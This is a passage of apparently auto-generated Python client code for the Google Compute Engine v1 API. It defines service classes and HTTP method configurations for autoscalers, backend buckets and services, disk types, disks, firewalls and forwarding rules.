  def Insert(self, request, global_params=None):
    """Creates an autoscaler in the specified project using the data included in the request.

    Args:
      request: (ComputeAutoscalersInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.autoscalers.insert',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/autoscalers',
      request_field=u'autoscaler',
      request_type_name=u'ComputeAutoscalersInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of autoscalers contained within the specified zone.

    Args:
      request: (ComputeAutoscalersListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (AutoscalerList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.autoscalers.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/autoscalers',
      request_field='',
      request_type_name=u'ComputeAutoscalersListRequest',
      response_type_name=u'AutoscalerList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeAutoscalersPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Note: the target autoscaler is named via the 'autoscaler' query
  # parameter here (not a path parameter, unlike Delete/Get).
  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.autoscalers.patch',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'autoscaler'],
      relative_path=u'projects/{project}/zones/{zone}/autoscalers',
      request_field=u'autoscalerResource',
      request_type_name=u'ComputeAutoscalersPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Update(self, request, global_params=None):
    """Updates an autoscaler in the specified project using the data included in the request.

    Args:
      request: (ComputeAutoscalersUpdateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Update')
    return self._RunMethod(
        config, request, global_params=global_params)

  Update.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PUT',
      method_id=u'compute.autoscalers.update',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'autoscaler'],
      relative_path=u'projects/{project}/zones/{zone}/autoscalers',
      request_field=u'autoscalerResource',
      request_type_name=u'ComputeAutoscalersUpdateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class BackendBucketsService(base_api.BaseApiService):
  """Service class for the backendBuckets resource.

  Each public method issues one HTTP request; its wire configuration is
  attached as a ``method_config`` attribute and looked up by name through
  ``self.GetMethodConfig``.
  """

  _NAME = u'backendBuckets'

  def __init__(self, client):
    super(ComputeV1.BackendBucketsService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified BackendBucket resource.

    Args:
      request: (ComputeBackendBucketsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Static HTTP wire metadata for the method above; evaluated lazily.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.backendBuckets.delete',
      ordered_params=[u'project', u'backendBucket'],
      path_params=[u'backendBucket', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
      request_field='',
      request_type_name=u'ComputeBackendBucketsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified BackendBucket resource. Get a list of available backend buckets by making a list() request.

    Args:
      request: (ComputeBackendBucketsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendBucket) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendBuckets.get',
      ordered_params=[u'project', u'backendBucket'],
      path_params=[u'backendBucket', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
      request_field='',
      request_type_name=u'ComputeBackendBucketsGetRequest',
      response_type_name=u'BackendBucket',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a BackendBucket resource in the specified project using the data included in the request.

    Args:
      request: (ComputeBackendBucketsInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendBuckets.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendBuckets',
      request_field=u'backendBucket',
      request_type_name=u'ComputeBackendBucketsInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of BackendBucket resources available to the specified project.

    Args:
      request: (ComputeBackendBucketsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendBucketList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendBuckets.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/backendBuckets',
      request_field='',
      request_type_name=u'ComputeBackendBucketsListRequest',
      response_type_name=u'BackendBucketList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Updates the specified BackendBucket resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeBackendBucketsPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.backendBuckets.patch',
      ordered_params=[u'project', u'backendBucket'],
      path_params=[u'backendBucket', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
      request_field=u'backendBucketResource',
      request_type_name=u'ComputeBackendBucketsPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Update(self, request, global_params=None):
    """Updates the specified BackendBucket resource with the data included in the request.

    Args:
      request: (ComputeBackendBucketsUpdateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Update')
    return self._RunMethod(
        config, request, global_params=global_params)

  Update.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PUT',
      method_id=u'compute.backendBuckets.update',
      ordered_params=[u'project', u'backendBucket'],
      path_params=[u'backendBucket', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
      request_field=u'backendBucketResource',
      request_type_name=u'ComputeBackendBucketsUpdateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class BackendServicesService(base_api.BaseApiService):
  """Service class for the backendServices resource.

  Each public method issues one HTTP request; its wire configuration is
  attached as a ``method_config`` attribute and looked up by name through
  ``self.GetMethodConfig``.
  """

  _NAME = u'backendServices'

  def __init__(self, client):
    super(ComputeV1.BackendServicesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves the list of all BackendService resources, regional and global, available to the specified project.

    Args:
      request: (ComputeBackendServicesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendServiceAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Static HTTP wire metadata for the method above; evaluated lazily.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendServices.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/backendServices',
      request_field='',
      request_type_name=u'ComputeBackendServicesAggregatedListRequest',
      response_type_name=u'BackendServiceAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified BackendService resource.

    Args:
      request: (ComputeBackendServicesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.backendServices.delete',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field='',
      request_type_name=u'ComputeBackendServicesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified BackendService resource. Get a list of available backend services by making a list() request.

    Args:
      request: (ComputeBackendServicesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendService) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendServices.get',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field='',
      request_type_name=u'ComputeBackendServicesGetRequest',
      response_type_name=u'BackendService',
      supports_download=False,
  )

  def GetHealth(self, request, global_params=None):
    """Gets the most recent health check results for this BackendService.

    Args:
      request: (ComputeBackendServicesGetHealthRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendServiceGroupHealth) The response message.
    """
    config = self.GetMethodConfig('GetHealth')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Note: GetHealth is a POST despite being a read — the group reference
  # travels in the request body ('resourceGroupReference').
  GetHealth.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.getHealth',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}/getHealth',
      request_field=u'resourceGroupReference',
      request_type_name=u'ComputeBackendServicesGetHealthRequest',
      response_type_name=u'BackendServiceGroupHealth',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a backend service. Read Restrictions and Guidelines for more information.

    Args:
      request: (ComputeBackendServicesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices',
      request_field=u'backendService',
      request_type_name=u'ComputeBackendServicesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of BackendService resources available to the specified project.

    Args:
      request: (ComputeBackendServicesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendServiceList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendServices.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/backendServices',
      request_field='',
      request_type_name=u'ComputeBackendServicesListRequest',
      response_type_name=u'BackendServiceList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Patches the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeBackendServicesPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.backendServices.patch',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field=u'backendServiceResource',
      request_type_name=u'ComputeBackendServicesPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Update(self, request, global_params=None):
    """Updates the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.

    Args:
      request: (ComputeBackendServicesUpdateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Update')
    return self._RunMethod(
        config, request, global_params=global_params)

  Update.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PUT',
      method_id=u'compute.backendServices.update',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field=u'backendServiceResource',
      request_type_name=u'ComputeBackendServicesUpdateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class DiskTypesService(base_api.BaseApiService):
  """Service class for the diskTypes resource.

  Each public method issues one HTTP request; its wire configuration is
  attached as a ``method_config`` attribute and looked up by name through
  ``self.GetMethodConfig``.
  """

  _NAME = u'diskTypes'

  def __init__(self, client):
    super(ComputeV1.DiskTypesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of disk types.

    Args:
      request: (ComputeDiskTypesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskTypeAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Static HTTP wire metadata for the method above; evaluated lazily.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.diskTypes.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/diskTypes',
      request_field='',
      request_type_name=u'ComputeDiskTypesAggregatedListRequest',
      response_type_name=u'DiskTypeAggregatedList',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified disk type. Get a list of available disk types by making a list() request.

    Args:
      request: (ComputeDiskTypesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskType) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.diskTypes.get',
      ordered_params=[u'project', u'zone', u'diskType'],
      path_params=[u'diskType', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/diskTypes/{diskType}',
      request_field='',
      request_type_name=u'ComputeDiskTypesGetRequest',
      response_type_name=u'DiskType',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of disk types available to the specified project.

    Args:
      request: (ComputeDiskTypesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskTypeList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.diskTypes.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/diskTypes',
      request_field='',
      request_type_name=u'ComputeDiskTypesListRequest',
      response_type_name=u'DiskTypeList',
      supports_download=False,
  )
class DisksService(base_api.BaseApiService):
    """Methods for the disks API resource."""

    _NAME = u'disks'

    def __init__(self, client):
        super(ComputeV1.DisksService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of persistent disks.

        Args:
          request: (ComputeDisksAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (DiskAggregatedList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.aggregatedList',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/disks',
        request_field='',
        request_type_name=u'ComputeDisksAggregatedListRequest',
        response_type_name=u'DiskAggregatedList',
        supports_download=False,
    )

    def CreateSnapshot(self, request, global_params=None):
        """Creates a snapshot of a specified persistent disk.

        Args:
          request: (ComputeDisksCreateSnapshotRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('CreateSnapshot'), request,
            global_params=global_params)

    CreateSnapshot.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.createSnapshot',
        http_method=u'POST',
        ordered_params=[u'project', u'zone', u'disk'],
        path_params=[u'disk', u'project', u'zone'],
        query_params=[u'guestFlush'],
        relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/createSnapshot',
        request_field=u'snapshot',
        request_type_name=u'ComputeDisksCreateSnapshotRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified persistent disk. Deleting a disk removes its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.

        Args:
          request: (ComputeDisksDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.delete',
        http_method=u'DELETE',
        ordered_params=[u'project', u'zone', u'disk'],
        path_params=[u'disk', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
        request_field='',
        request_type_name=u'ComputeDisksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns a specified persistent disk. Get a list of available persistent disks by making a list() request.

        Args:
          request: (ComputeDisksGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Disk) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.get',
        http_method=u'GET',
        ordered_params=[u'project', u'zone', u'disk'],
        path_params=[u'disk', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
        request_field='',
        request_type_name=u'ComputeDisksGetRequest',
        response_type_name=u'Disk',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a persistent disk in the specified project using the data in the request. You can create a disk with a sourceImage, a sourceSnapshot, or create an empty 500 GB data disk by omitting all properties. You can also create a disk that is larger than the default size by specifying the sizeGb property.

        Args:
          request: (ComputeDisksInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.insert',
        http_method=u'POST',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'sourceImage'],
        relative_path=u'projects/{project}/zones/{zone}/disks',
        request_field=u'disk',
        request_type_name=u'ComputeDisksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of persistent disks contained within the specified zone.

        Args:
          request: (ComputeDisksListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (DiskList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.list',
        http_method=u'GET',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/disks',
        request_field='',
        request_type_name=u'ComputeDisksListRequest',
        response_type_name=u'DiskList',
        supports_download=False,
    )

    def Resize(self, request, global_params=None):
        """Resizes the specified persistent disk.

        Args:
          request: (ComputeDisksResizeRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Resize'), request,
            global_params=global_params)

    Resize.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.resize',
        http_method=u'POST',
        ordered_params=[u'project', u'zone', u'disk'],
        path_params=[u'disk', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/resize',
        request_field=u'disksResizeRequest',
        request_type_name=u'ComputeDisksResizeRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
        """Sets the labels on a disk. To learn more about labels, read the Labeling Resources documentation.

        Args:
          request: (ComputeDisksSetLabelsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetLabels'), request,
            global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.disks.setLabels',
        http_method=u'POST',
        ordered_params=[u'project', u'zone', u'resource'],
        path_params=[u'project', u'resource', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/disks/{resource}/setLabels',
        request_field=u'zoneSetLabelsRequest',
        request_type_name=u'ComputeDisksSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class FirewallsService(base_api.BaseApiService):
    """Methods for the firewalls API resource."""

    _NAME = u'firewalls'

    def __init__(self, client):
        super(ComputeV1.FirewallsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified firewall.

        Args:
          request: (ComputeFirewallsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.firewalls.delete',
        http_method=u'DELETE',
        ordered_params=[u'project', u'firewall'],
        path_params=[u'firewall', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/firewalls/{firewall}',
        request_field='',
        request_type_name=u'ComputeFirewallsDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified firewall.

        Args:
          request: (ComputeFirewallsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Firewall) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.firewalls.get',
        http_method=u'GET',
        ordered_params=[u'project', u'firewall'],
        path_params=[u'firewall', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/firewalls/{firewall}',
        request_field='',
        request_type_name=u'ComputeFirewallsGetRequest',
        response_type_name=u'Firewall',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a firewall rule in the specified project using the data included in the request.

        Args:
          request: (ComputeFirewallsInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.firewalls.insert',
        http_method=u'POST',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/firewalls',
        request_field=u'firewall',
        request_type_name=u'ComputeFirewallsInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of firewall rules available to the specified project.

        Args:
          request: (ComputeFirewallsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (FirewallList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.firewalls.list',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/firewalls',
        request_field='',
        request_type_name=u'ComputeFirewallsListRequest',
        response_type_name=u'FirewallList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Updates the specified firewall rule with the data included in the request. Using PUT method, can only update following fields of firewall rule: allowed, description, sourceRanges, sourceTags, targetTags. This method supports patch semantics.

        Args:
          request: (ComputeFirewallsPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Patch'), request,
            global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.firewalls.patch',
        http_method=u'PATCH',
        ordered_params=[u'project', u'firewall'],
        path_params=[u'firewall', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/firewalls/{firewall}',
        request_field=u'firewallResource',
        request_type_name=u'ComputeFirewallsPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates the specified firewall rule with the data included in the request. Using PUT method, can only update following fields of firewall rule: allowed, description, sourceRanges, sourceTags, targetTags.

        Args:
          request: (ComputeFirewallsUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Update'), request,
            global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.firewalls.update',
        http_method=u'PUT',
        ordered_params=[u'project', u'firewall'],
        path_params=[u'firewall', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/firewalls/{firewall}',
        request_field=u'firewallResource',
        request_type_name=u'ComputeFirewallsUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class ForwardingRulesService(base_api.BaseApiService):
    """Methods for the forwardingRules API resource."""

    _NAME = u'forwardingRules'

    def __init__(self, client):
        super(ComputeV1.ForwardingRulesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of forwarding rules.

        Args:
          request: (ComputeForwardingRulesAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ForwardingRuleAggregatedList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.forwardingRules.aggregatedList',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/forwardingRules',
        request_field='',
        request_type_name=u'ComputeForwardingRulesAggregatedListRequest',
        response_type_name=u'ForwardingRuleAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified ForwardingRule resource.

        Args:
          request: (ComputeForwardingRulesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.forwardingRules.delete',
        http_method=u'DELETE',
        ordered_params=[u'project', u'region', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
        request_field='',
